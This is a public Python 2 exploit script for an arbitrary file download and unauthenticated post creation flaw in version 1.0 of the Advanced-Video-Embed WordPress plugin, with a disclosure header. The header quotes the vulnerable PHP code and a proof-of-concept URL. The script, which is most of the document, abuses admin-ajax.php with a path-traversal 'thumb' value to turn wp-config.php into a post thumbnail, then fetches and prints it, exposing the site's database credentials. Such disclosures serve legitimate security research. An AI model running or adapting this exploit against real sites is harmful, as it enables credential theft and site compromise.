#!/usr/bin/env python # Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation # Google Dork: N/A # Date: 04/01/2016 # Exploit Author: evait security GmbH # Vendor Homepage: arshmultani - http://dscom.it/ # Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/ # Version: 1.0 # Tested on: Linux Apache / Wordpress 4.2.2 # Timeline # 03/24/2016 - Bug discovered # 03/24/2016 - Initial notification of vendor # 04/01/2016 - No answer from vendor, public release of bug # Vulnerable Code (/inc/classes/class.avePost.php) Line 57: # function ave_publishPost(){ # $title = $_REQUEST['title']; # $term = $_REQUEST['term']; # $thumb = $_REQUEST['thumb']; # <snip> # Line 78: # $image_data = file_get_contents($thumb); # POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH] # Exploit - Print the content of wp-config.php in terminal (default Wordpress config) import random import urllib2 import re url = "http://127.0.0.1/wordpress" # insert url to wordpress randomID = long(random.random() * 100000000000000000L) objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php') content = objHtml.readlines() for line in content: numbers = re.findall(r'\d+',line) id = numbers[-1] id = int(id) / 10 objHtml = urllib2.urlopen(url + '/?p=' + str(id)) content = objHtml.readlines() for line in content: if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line: urls=re.findall('"(https?://.*?)"', line) print urllib2.urlopen(urls[0]).read()